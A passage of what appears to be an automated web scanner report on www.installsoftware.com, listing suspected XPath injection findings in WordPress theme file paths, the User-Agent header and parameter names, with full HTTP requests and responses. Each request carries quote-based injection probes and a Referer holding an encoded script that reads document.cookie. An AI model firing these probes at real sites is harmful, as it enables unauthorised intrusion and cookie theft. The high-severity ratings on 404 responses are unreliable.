User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.39. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css'/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:24 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.40. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/typography.css' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:27 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.41. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.42. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/typography.css?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:44 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:45 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.43. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content'/themes/rt_mynxx_wp/css/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:59 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.44. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes'/rt_mynxx_wp/css/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:02 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.45. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp'/css/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:08 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.46. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css'/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.47. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/wp.css' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.48. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:43 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.49. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/wp.css?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:40 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.50. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content'/themes/rt_mynxx_wp/js/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:02 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.51. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes'/rt_mynxx_wp/js/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:14 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.52. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp'/js/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
